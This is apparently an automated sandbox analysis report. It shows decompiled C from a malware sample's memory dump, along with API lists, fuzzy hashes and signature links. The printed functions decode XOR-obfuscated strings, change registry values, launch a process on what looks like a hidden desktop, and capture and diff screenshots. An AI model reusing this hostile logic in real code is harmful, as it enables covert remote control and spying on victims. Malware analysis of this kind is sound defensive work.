				char _v112;
				long _v152;
				void* __edi;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t107;
				void* _t113;
				signed int _t116;
				signed int _t125;
				void* _t128;
				signed int _t129;
				intOrPtr* _t130;
				intOrPtr _t134;
				signed int _t143;
				signed int _t153;
				long _t154;
				long _t156;
				void* _t158;
				signed int* _t160;
				long _t161;
				signed int* _t165;
				void* _t172;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed char _t184;
				char _t189;
				void* _t190;
				unsigned int _t192;
				signed int _t194;
				signed int* _t195;
				unsigned int _t197;
				void* _t200;
				signed int _t202;

				if(_a8 == 0) {
					L1:
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					return E00B528EC() | 0xffffffff;
				}
				__eflags = _a12;
				if(_a12 == 0) {
					goto L1;
				}
				__eflags = _a4 - 4;
				if(_a4 > 4) {
					 *(E00B55BAA()) =  *_t152 & 0x00000000;
					goto L1;
				}
				_push(_t153);
				_v16 = 0;
				_v8 = 0;
				_t93 = E00B61217(_a12, _a16,  &_v16,  &_v8);
				_t154 = _t153 | 0xffffffff;
				__eflags = _t93 - _t154;
				if(_t93 == _t154) {
					E00B564B8(_v8);
					_v8 = 0;
					E00B564B8(_v16);
					L9:
					_t113 = _t154;
					L36:
					return _t113;
				}
				__eflags = _a4 - 4;
				_v12 = 0;
				_t98 = E00B56A8A( &_v12,  &_v20, (_t93 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff);
				__eflags = _t98;
				if(_t98 == 0) {
					E00B564B8(_v12);
					_v12 = 0;
					E00B564B8(_v8);
					_v8 = 0;
					E00B564B8(_v16);
					goto L9;
				}
				__eflags = _a4 - 4;
				if(_a4 == 4) {
					_push(8);
					_pop(0);
				}
				_t99 = E00B55BAA();
				 *_t99 = 0;
				_t189 = 0x44;
				E00B4D0F0(_t189,  &_v112, 0, _t189);
				_v62 = _v20;
				_v60 = _v12;
				_v112 = _t189;
				_t107 = E00B61292(_t161, __eflags, _a8, _v16, 0, 0, 1, 0, _v8, 0,  &_v112,  &_v44);
				_t200 = _v44;
				_t190 = _v40;
				__eflags = _t107;
				if(_t107 == 0) {
					L21:
					E00B55B87(GetLastError());
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					L31:
					E00B564B8(_v12);
					_v12 = _v12 & 0x00000000;
					E00B564B8(_v8);
					_v8 = _v8 & 0x00000000;
					E00B564B8(_v16);
					_t113 = _t154;
					L35:
					goto L36;
				}
				_t116 = _a4;
				__eflags = _t116 - 2;
				if(_t116 != 2) {
					__eflags = _t116;
					if(_t116 != 0) {
						__eflags = _t116 - 4;
						if(_t116 != 4) {
							__eflags = _t190 - _t154;
							if(_t190 != _t154) {
								CloseHandle(_t190);
							}
							E00B564B8(_v12);
							_v12 = _v12 & 0x00000000;
							E00B564B8(_v8);
							_t56 =  &_v8;
							 *_t56 = _v8 & 0x00000000;
							__eflags =  *_t56;
							E00B564B8(_v16);
							_t113 = _t200;
							goto L35;
						}
						__eflags = _t190 - _t154;
						if(_t190 != _t154) {
							CloseHandle(_t190);
						}
						__eflags = _t200 - _t154;
						if(_t200 != _t154) {
							CloseHandle(_t200);
						}
						_t154 = 0;
						__eflags = 0;
						goto L31;
					}
					WaitForSingleObject(_t200, _t154);
					_t143 = GetExitCodeProcess(_v44,  &_v24);
					__eflags = _t143;
					if(_t143 == 0) {
						goto L21;
					}
					_v28 = _v24;
					__eflags = _t190 - _t154;
					if(_t190 != _t154) {
						CloseHandle(_t190);
					}
					__eflags = _t200 - _t154;
					if(_t200 != _t154) {
						CloseHandle(_t200);
					}
					_t154 = _v28;
					goto L31;
				}
				E00B52EE0(0);
				asm("int3");
				_push(_t154);
				_t156 = _t161;
				_push(_t200);
				_push(_t190);
				_v152 = _t156;
				 *( *( *_t156)) =  *( *( *_t156)) & 0x00000000;
				 *( *( *(_t156 + 4))) =  *( *( *(_t156 + 4))) & 0x00000000;
				_t202 =  *0xb6a8c8; // 0x40
				__eflags = _t202;
				if(_t202 != 0) {
					_t60 = _t202 - 1; // 0x3f
					_t197 = _t60;
					while(1) {
						_t178 = (_t197 & 0x0000003f) * 0x38;
						_t134 =  *((intOrPtr*)(0xb6a6c8 + (_t197 >> 6) * 4));
						__eflags =  *((char*)(_t134 + _t178 + 0x28));
						if( *((char*)(_t134 + _t178 + 0x28)) == 0) {
							goto L43;
						}
						_t197 = _t197 - 1;
						_t202 = _t202 - 1;
						__eflags = _t202;
						if(_t202 != 0) {
							continue;
						}
						goto L43;
					}
				}
				L43:
				__eflags = _t202 - 0x3332;
				if(_t202 < 0x3332) {
					_v32 = 0x00000004 + _t202 * 0x00000005 & 0x0000ffff;
					_t125 = E00B598AF(0x00000004 + _t202 * 0x00000005 & 0x0000ffff, 1);
					_v24 = _t125;
					__eflags = _t125;
					if(_t125 != 0) {
						_t67 = _t125 + 4; // 0x4
						_t181 = _t67;
						 *_t125 = _t202;
						_t165 = _t181 + _t202;
						_v12 = _t181;
						_t192 = 0;
						_v16 = _t165;
						_v20 = _t165;
						__eflags = _t202;
						if(_t202 != 0) {
							_t129 = _t181;
							_t160 = _t165;
							do {
								_t176 = (_t192 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb6a6c8 + (_t192 >> 6) * 4));
								_t184 =  *((intOrPtr*)(_t176 + 0x28));
								__eflags = _t184 & 0x00000010;
								if((_t184 & 0x00000010) != 0) {
									 *(_t129 + _t192) = 0;
									_t177 = _t176 | 0xffffffff;
									__eflags = _t177;
								} else {
									 *(_t129 + _t192) = _t184;
									_t177 =  *(_t176 + 0x18);
								}
								 *_t160 = _t177;
								_t192 = _t192 + 1;
								_t160 =  &(_t160[1]);
								__eflags = _t192 - _t202;
							} while (_t192 != _t202);
							_t125 = _v24;
							_t156 = _v28;
							_t181 = _v12;
						}
						__eflags =  *((char*)( *((intOrPtr*)(_t156 + 8))));
						if( *((char*)( *((intOrPtr*)(_t156 + 8)))) == 0) {
							_t172 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t202 - 3;
								if(_t202 >= 3) {
									_t194 = 3;
								} else {
									_t194 = _t202;
								}
								__eflags = _t172 - _t194;
								if(_t172 == _t194) {
									goto L61;
								}
								_t195 = _v16;
								 *_t181 = 0;
								 *_t195 =  *_t195 | 0xffffffff;
								_t172 = _t172 + 1;
								_t181 = _t181 + 1;
								_v16 =  &(_t195[1]);
							}
						}
						L61:
						 *( *( *_t156)) = _t125;
						_t158 = 1;
						__eflags = 1;
						 *( *( *(_t156 + 4))) = _v32;
					} else {
						_t130 = E00B55BBD();
						_t158 = 0;
						 *_t130 = 0xc;
					}
					E00B564B8(0);
					_t128 = _t158;
				} else {
					 *((intOrPtr*)(E00B55BBD())) = 0xc;
					_t128 = 0;
				}
				return _t128;
			}

APIs

Part of subcall function 00B61217: _free.LIBCMT ref: 00B61239

_free.LIBCMT ref: 00B567AA
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5686D
GetExitCodeProcess.KERNEL32 ref: 00B5687A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5688F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5689A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568A5
__dosmaperr.LIBCMT ref: 00B568AC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568B7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568C2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568D4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B568DF
_free.LIBCMT ref: 00B5679F

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B567D8
_free.LIBCMT ref: 00B567E3
_free.LIBCMT ref: 00B567EE
_free.LIBCMT ref: 00B568EA
_free.LIBCMT ref: 00B568F6
_free.LIBCMT ref: 00B56902
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B56910
_free.LIBCMT ref: 00B56919
_free.LIBCMT ref: 00B56925
_free.LIBCMT ref: 00B56931

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
String ID:
API String ID: 3529756214-0
Opcode ID: 65d1887233a369ca119950622a750f63315d8a338382a5b5720eb3f43da4e552
Instruction ID: d358e7b5d518d5e48d725a1dfc67c71bbf16b97cd3a497e1a81e939d3f64c83f
Opcode Fuzzy Hash: 65d1887233a369ca119950622a750f63315d8a338382a5b5720eb3f43da4e552
Instruction Fuzzy Hash: A5512971900108AFDF11AF94C885BAE7BF9EF45326F5040E6FD11A7260DB394E98DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B457CD, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 175
registrystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B457CD(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				signed int _v16;
				char _v276;
				char _v280;
				char _v296;
				char _v297;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v356;
				short _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				char _v372;
				struct _AppBarData _v408;
				struct _STARTUPINFOA _v484;
				struct _PROCESS_INFORMATION _v500;
				char _v504;
				int _v508;
				char _v512;
				int _v516;
				char _v520;
				char _v523;
				char _v524;
				void* _v528;
				signed int _t60;
				char* _t62;
				signed char _t75;
				struct HWND__* _t92;
				char* _t102;
				CHAR* _t105;
				int _t116;
				long _t119;
				void* _t120;
				char _t123;
				signed int _t126;
				signed int _t128;

				_t126 =  &_v524;
				_t60 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t60 ^ _t126;
				asm("movaps xmm0, [0xb3dc50]");
				_t123 = 2;
				_v504 = _t123;
				asm("movups [esp+0xf4], xmm0");
				_v280 = 0;
				_t62 = E00B42846( &_v296);
				asm("movaps xmm0, [0xb3dbe0]");
				asm("movups [esp+0xb8], xmm0");
				_t102 = _t62;
				_v308 = 0x322e0315;
				asm("movaps xmm0, [0xb3ddb0]");
				_t105 = 0;
				asm("movups [esp+0xc8], xmm0");
				_v304 = 0x19170310;
				asm("movaps xmm0, [0xb3dbb0]");
				asm("movups [esp+0xd8], xmm0");
				_v300 = 0x1e1c1b;
				do {
					_t8 = _t105 + 0x40; // 0x40
					 *(_t126 + _t105 + 0xb8) =  *(_t126 + _t105 + 0xb8) ^ _t8;
					_t105 = _t105 + 1;
				} while (_t105 < 0x3b);
				_v297 = 0;
				RegOpenKeyExA(0x80000001,  &_v356, 0, 0xf003f,  &_v520);
				_t116 = 4;
				_v516 = _t116;
				_v508 = _t116;
				RegQueryValueExA(_v520, _t102, 0,  &_v508,  &_v512,  &_v516);
				if(_v512 != _t123) {
					RegSetValueExA(_v520, _t102, 0, _t116,  &_v504, _v516);
				}
				E00B4D0F0(0,  &_v276, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_t75 = 0x1c;
				_v523 = 0;
				_v524 = _t75 ^ 0x00000040;
				_v523 = 0;
				lstrcatA( &_v276,  &_v524);
				_v372 = 0x2f323925;
				_v368 = 0x3523372b;
				_v364 = 0x2e322c66;
				_v360 = 0;
				lstrcatA( &_v276, E00B42810( &_v372));
				_t119 = 0x44;
				E00B4D0F0(0,  &_v484, 0, lstrcatA);
				_v484.cb = _t119;
				_v484.lpDesktop = 0xb699c0;
				asm("stosd");
				_t128 = _t126 + 0x18;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( &_v276, 0, 0, 0, 0, 0, 0, 0,  &_v484,  &_v500);
				_v408.cbSize = 0x24;
				_t120 = 0;
				while(1) {
					Sleep(0x3e8);
					_v372 = 0x2f272913;
					_v368 = 0x35121a28;
					_v364 = 0x251d3029;
					_v360 = 0x28;
					_t92 = FindWindowA(E00B427BF( &_v372), 0);
					_v408.hWnd = _t92;
					if(_t92 != 0) {
						break;
					}
					_t120 = _t120 + 1;
					if(_t120 < 5) {
						continue;
					}
					break;
				}
				_v408.lParam = 2;
				SHAppBarMessage(0xa,  &_v408);
				RegSetValueExA(_v528, _t102, 0, 4,  &_v520, _v524);
				RegCloseKey(_v528);
				return E00B4AE43(_v16 ^ _t128);
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00B45892
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B458BA
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B458DC
GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00B458FE
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B4592A
lstrcatA.KERNEL32(?,00000000), ref: 00B4596A
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00B459B0
Sleep.KERNEL32(000003E8), ref: 00B459C8
FindWindowA.USER32(00000000), ref: 00B45A08
SHAppBarMessage.SHELL32(0000000A,00000024), ref: 00B45A34
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B45A4C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B45A52

Strings

$, xrefs: 00B459B6
Tett, xrefs: 00B45986
%92/, xrefs: 00B45933
f,2., xrefs: 00B45949
(, xrefs: 00B459F8
+7#5, xrefs: 00B4593E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$lstrcat$CloseCreateDirectoryFindMessageOpenProcessQuerySleepWindowWindows
String ID: $$%92/$($+7#5$Tett$f,2.
API String ID: 3986954507-4036093491
Opcode ID: 3aeb613124a0527e3a7eb0cd64aa1caae518c04367f2434dc0794caa4f51b0b0
Instruction ID: cce3f34868e4167c2ef0672334c70a45f122870f9b7173de8c97d534cd7eb6f5
Opcode Fuzzy Hash: 3aeb613124a0527e3a7eb0cd64aa1caae518c04367f2434dc0794caa4f51b0b0
Instruction Fuzzy Hash: 62615AB1408384AAD330DB65DC45BEBBBE8EF99314F00491DF68997161EB709688CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00B44426, Relevance: 28.7, APIs: 19, Instructions: 222
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B44426(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				struct tagRECT _v24;
				struct HDC__* _v36;
				intOrPtr _v40;
				void* _v44;
				struct HDC__* _v52;
				struct HDC__* _v56;
				struct HDC__* _v60;
				struct HDC__* _v64;
				int _v68;
				struct HDC__* _v72;
				struct HDC__* _v96;
				void* _v144;
				signed int _v152;
				struct HDC__* _v176;
				signed int _v188;
				signed int _t53;
				void* _t59;
				struct HWND__* _t61;
				void* _t73;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				struct HWND__* _t87;
				void* _t100;
				int _t101;
				void* _t102;
				signed int _t104;
				signed int _t109;
				struct HWND__* _t110;
				signed int _t112;
				struct HDC__* _t114;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				void* _t119;
				struct HDC__* _t121;
				void* _t122;
				struct HWND__* _t123;
				void* _t125;
				int _t126;
				char* _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;

				_t130 =  &_v44;
				_t53 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t53 ^ _t130;
				_t100 = __edx;
				_t125 = __ecx;
				GetWindowRect(GetDesktopWindow(),  &_v24);
				_t114 = GetDC(0);
				_v36 = _t114;
				_t121 = CreateCompatibleDC(_t114);
				_v44 = _t121;
				_t59 = CreateCompatibleBitmap(_t114, _v24.top, _v24.right);
				_v60 = _t59;
				SelectObject(_t121, _t59);
				_v56 = _t114;
				_v52 = _t121;
				_t61 = GetTopWindow(0);
				if(_t61 == 0) {
					L6:
					__eflags = _t125 - _v40;
					_t126 =  >  ? _v40 : _t125;
					__eflags = _t100 - _v36;
					_t101 =  >  ? _v36 : _t100;
					__eflags = _t126 - _v40;
					if(_t126 != _v40) {
						L8:
						_t115 = CreateCompatibleBitmap(_t114, _t126, _t101);
						_t121 = CreateCompatibleDC(_v72);
						SelectObject(_t121, _t115);
						SetStretchBltMode(_t121, 4);
						__eflags = 0;
						StretchBlt(_t121, 0, 0, _t126, _t101, _v96, 0, 0, _v72, _v68, 0xcc0020);
						DeleteObject(_v144);
						DeleteDC(_v144);
						_v152 = _t115;
						L9:
						_t117 = 1;
						 *0xb6ae58 = _t101 * _t126 * 3;
						_t73 =  *0xb6ae74; // 0x0
						__eflags = _t73;
						if(_t73 == 0) {
							L12:
							E00B50985(_t73);
							E00B50985( *0xb6ae88);
							E00B50985( *0xb6ae80);
							_push( *0xb6ae58);
							_t77 = E00B509A2();
							_push( *0xb6ae58);
							 *0xb6ae74 = _t77;
							_t78 = E00B509A2();
							_push( *0xb6ae58);
							 *0xb6ae88 = _t78;
							_t79 = E00B509A2();
							_t130 = _t130 + 0x18;
							 *0xb6ae80 = _t79;
							_t73 =  *0xb6ae74; // 0x0
							_t117 = 0;
							__eflags = 0;
							L13:
							 *0xb6ae48 = _t126;
							 *0xb6ae4c = _t101;
							_t102 = _v152;
							GetDIBits(_t121, _t102, 0, _t101, _t73, 0xb6ae44, 0);
							DeleteObject(_t102);
							ReleaseDC(0, _v176);
							DeleteDC(_t121);
							__eflags = _t117;
							if(_t117 == 0) {
								_push( *0xb6ae58);
								_push( *0xb6ae74);
								_push( *0xb6ae88);
								L32:
								E00B4D670();
								_t131 = _t130 + 0xc;
								__eflags = 0;
								L33:
								__eflags = _v152 ^ _t131;
								return E00B4AE43(_v152 ^ _t131);
							}
							_t109 =  *0xb6ae58; // 0x0
							_t87 = 0;
							_t122 =  *0xb6ae74; // 0x0
							__eflags = _t109;
							if(_t109 == 0) {
								L20:
								E00B4D670( *0xb6ae80, _t122, _t109);
								_t112 =  *0xb6ae58; // 0x0
								_t131 = _t130 + 0xc;
								_v188 = 1;
								_t110 = 0;
								_t36 = _t112 - 1; // -1
								__eflags = _t36;
								if(_t36 == 0) {
									L30:
									goto L33;
								}
								_t118 =  *0xb6ae88; // 0x0
								_t104 = _t118 - _t122;
								__eflags = _t104;
								do {
									_t128 = _t122 + _t110;
									__eflags =  *_t128 -  *((intOrPtr*)(_t104 + _t128));
									if( *_t128 !=  *((intOrPtr*)(_t104 + _t128))) {
										L26:
										_t129 = 0;
										__eflags = 0;
										_v188 = 0;
										goto L27;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									 *_t128 = 0xff;
									_t129 = _v188;
									 *((short*)(_t122 +  &(_t110->i))) = 0xc9ae;
									_t112 =  *0xb6ae58; // 0x0
									L27:
									_t110 =  &(_t110->i);
									_t51 = _t112 - 1; // -1
									__eflags = _t110 - _t51;
								} while (_t110 < _t51);
								__eflags = _t129;
								if(_t129 != 0) {
									goto L30;
								}
								_push(_t112);
								_push( *0xb6ae80);
								_push(_t118);
								goto L32;
							} else {
								goto L15;
							}
							do {
								L15:
								__eflags =  *((char*)(_t122 + _t87)) - 0xff;
								if( *((char*)(_t122 + _t87)) == 0xff) {
									__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xae;
									if( *((char*)(_t122 +  &(_t87->i))) == 0xae) {
										__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xc9;
										if( *((char*)(_t122 +  &(_t87->i))) == 0xc9) {
											 *((char*)(_t122 +  &(_t87->i))) = 0xaf;
											_t109 =  *0xb6ae58; // 0x0
										}
									}
								}
								_t87 =  &(_t87->i);
								__eflags = _t87 - _t109;
							} while (_t87 < _t109);
							goto L20;
						}
						__eflags =  *0xb6ae48 - _t126; // 0x0
						if(__eflags != 0) {
							goto L12;
						}
						__eflags =  *0xb6ae4c - _t101; // 0x0
						if(__eflags == 0) {
							goto L13;
						}
						goto L12;
					}
					__eflags = _t101 - _v36;
					if(_t101 == _v36) {
						goto L9;
					}
					goto L8;
				} else {
					_t119 = GetWindow;
					_push(1);
					_push(_t61);
					while(1) {
						_t123 = GetWindow();
						if(_t123 == 0 || E00B44383(_t100, _t119, _t123, _t123,  &_v56) == 0) {
							break;
						}
						_push(3);
						_push(_t123);
					}
					_t114 = _v60;
					_t121 = _v64;
					goto L6;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 00B4443C
GetWindowRect.USER32 ref: 00B44448
GetDC.USER32(00000000), ref: 00B44450
CreateCompatibleDC.GDI32(00000000), ref: 00B4445D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B44472
SelectObject.GDI32(00000000,00000000), ref: 00B4447E
GetTopWindow.USER32 ref: 00B4448E
GetWindow.USER32(00000000,00000001), ref: 00B444A1

Part of subcall function 00B44383: IsWindowVisible.USER32 ref: 00B4439F
Part of subcall function 00B44383: GetWindowLongA.USER32 ref: 00B443B9
Part of subcall function 00B44383: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00B443C3
Part of subcall function 00B44383: GetVersionExA.KERNEL32(00000094), ref: 00B443F0
Part of subcall function 00B44383: GetTopWindow.USER32 ref: 00B44400

CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B444E6
CreateCompatibleDC.GDI32(?), ref: 00B444F2
SelectObject.GDI32(00000000,00000000), ref: 00B444FC
SetStretchBltMode.GDI32(00000000,00000004), ref: 00B44505
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00B44525
DeleteObject.GDI32(?), ref: 00B4452F
DeleteDC.GDI32(?), ref: 00B44539
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00B6AE44,00000000), ref: 00B445DF
DeleteObject.GDI32(?), ref: 00B445E6
ReleaseDC.USER32 ref: 00B445F1
DeleteDC.GDI32(00000000), ref: 00B445F8

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteObject$BitmapLongSelectStretch$BitsDesktopModeRectReleaseVersionVisible
String ID:
API String ID: 2588145-0
Opcode ID: 4e802a8f4697d8081331e899cfcbb4d09234019f669c3c19c7e3da644a08397a
Instruction ID: 36b7829db5f257c0ea0d1426ed27905035e1138ff2e28f83043603bc44ec1b79
Opcode Fuzzy Hash: 4e802a8f4697d8081331e899cfcbb4d09234019f669c3c19c7e3da644a08397a
Instruction Fuzzy Hash: 2581D372118340AFCB119F24EC44A2ABBE9FF85714B140599F540931A1DFBADA15EF62

Uniqueness

Uniqueness Score: -1.00%

Function 00B42966, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B42966(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				char* _t53;
				char _t56;
				void* _t58;
				long _t60;
				intOrPtr _t65;
				short _t66;
				char _t67;
				void _t68;
				void _t72;
				void _t73;
				void* _t76;
				void* _t77;
				long _t79;
				char* _t88;
				int _t91;
				intOrPtr* _t92;
				signed int _t97;
				void* _t102;
				signed int _t104;
				void* _t112;
				void* _t113;
				signed int _t114;
				short* _t118;
				void* _t119;
				void* _t124;
				void* _t133;
				void* _t134;
				char* _t137;
				signed int _t138;
				signed int _t140;
				void* _t141;
				void* _t142;

				_t50 =  *0xb69014; // 0xce6f0fb5
				 *(_t140 + 0x3c) = _t50 ^ _t140;
				_push(0x208);
				 *((intOrPtr*)(_t140 + 0x18)) =  *((intOrPtr*)(_t140 + 0x44));
				_t53 = E00B509A2();
				asm("movaps xmm0, [0xb3dd20]");
				_t88 = _t53;
				asm("movups [esp+0x28], xmm0");
				asm("movaps xmm0, [0xb3dc60]");
				_t91 = 0;
				asm("movups [esp+0x34], xmm0");
				 *((char*)(_t140 + 0x44)) = 0;
				do {
					_t5 = _t91 + 0x40; // 0x40
					 *(_t140 + _t91 + 0x24) =  *(_t140 + _t91 + 0x24) ^ _t5;
					_t91 = _t91 + 1;
				} while (_t91 < 0x20);
				_t92 = _t140 + 0x24;
				 *((char*)(_t140 + 0x44)) = 0;
				_t112 = _t88 - _t92;
				do {
					_t56 =  *_t92;
					 *((char*)(_t112 + _t92)) = _t56;
					_t92 = _t92 + 1;
				} while (_t56 != 0);
				 *(_t140 + 0x1c) = 0;
				_t58 = GetCurrentProcess();
				__imp__IsWow64Process(_t58, _t140 + 0x18);
				if(_t58 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
					_t60 = RegOpenKeyA(0x80000002, _t88, _t140 + 0xc);
				} else {
					_t60 = RegOpenKeyExA(0x80000002, _t88, 0, 0x109, _t140 + 0xc);
				}
				if(_t60 == 0) {
					_push(0x104);
					_t137 = E00B509A2();
					RegEnumKeyA( *(_t140 + 0x1c), 0, _t137, 0x104);
					_t19 = _t88 - 1; // -1
					_t118 = _t19;
					do {
						_t65 =  *((intOrPtr*)(_t118 + 1));
						_t118 = _t118 + 1;
					} while (_t65 != 0);
					_t66 =  *0xb3d854; // 0x5c
					_t133 = _t137;
					 *_t118 = _t66;
					do {
						_t67 =  *_t137;
						_t137 =  &(_t137[1]);
					} while (_t67 != 0);
					_t138 = _t137 - _t133;
					_t21 = _t88 - 1; // -1
					_t119 = _t21;
					do {
						_t68 =  *(_t119 + 1);
						_t119 = _t119 + 1;
					} while (_t68 != 0);
					 *(_t140 + 0x1c) = 0x2a230c1c;
					_t97 = _t138 >> 2;
					memcpy(_t119, _t133, _t97 << 2);
					_t141 = _t140 + 0xc;
					 *((short*)(_t141 + 0x20)) = 0x2a;
					memcpy(_t133 + _t97 + _t97, _t133, _t138 & 0x00000003);
					_t142 = _t141 + 0xc;
					_t102 = 0;
					do {
						_t26 = _t102 + 0x40; // 0x40
						 *(_t142 + _t102 + 0x18) =  *(_t142 + _t102 + 0x18) ^ _t26;
						_t102 = _t102 + 1;
					} while (_t102 < 5);
					_t113 = _t142 + 0x18;
					 *((char*)(_t142 + 0x1d)) = 0;
					_t134 = _t113;
					do {
						_t72 =  *_t113;
						_t113 = _t113 + 1;
					} while (_t72 != 0);
					_t114 = _t113 - _t134;
					_t33 = _t88 - 1; // -1
					_t124 = _t33;
					do {
						_t73 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t73 != 0);
					_t104 = _t114 >> 2;
					memcpy(_t124, _t134, _t104 << 2);
					_t76 = memcpy(_t134 + _t104 + _t104, _t134, _t114 & 0x00000003);
					_t140 = _t142 + 0x18;
					 *(_t140 + 0x1c) = 0;
					_t77 = GetCurrentProcess();
					__imp__IsWow64Process(_t77, _t76);
					if(_t77 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
						_t79 = RegOpenKeyA(0x80000002, _t88, _t140 + 0x10);
					} else {
						_t79 = RegOpenKeyExA(0x80000002, _t88, 0, 0x101, _t140 + 0x10);
					}
					if(_t79 != 0) {
						goto L27;
					} else {
						_push(0);
						 *((intOrPtr*)(_t140 + 0x20)) = 0x2b362010;
						 *((intOrPtr*)(_t140 + 0x24)) = 0x3f032a10;
						 *((short*)(_t140 + 0x28)) = 0x2d;
						E00B42CCF(_t140 + 0x20,  *(_t140 + 0x1c), E00B42D10(_t140 + 0x20),  *((intOrPtr*)(_t140 + 0x18)));
						RegCloseKey( *(_t140 + 0xc));
						RegCloseKey( *(_t140 + 0x10));
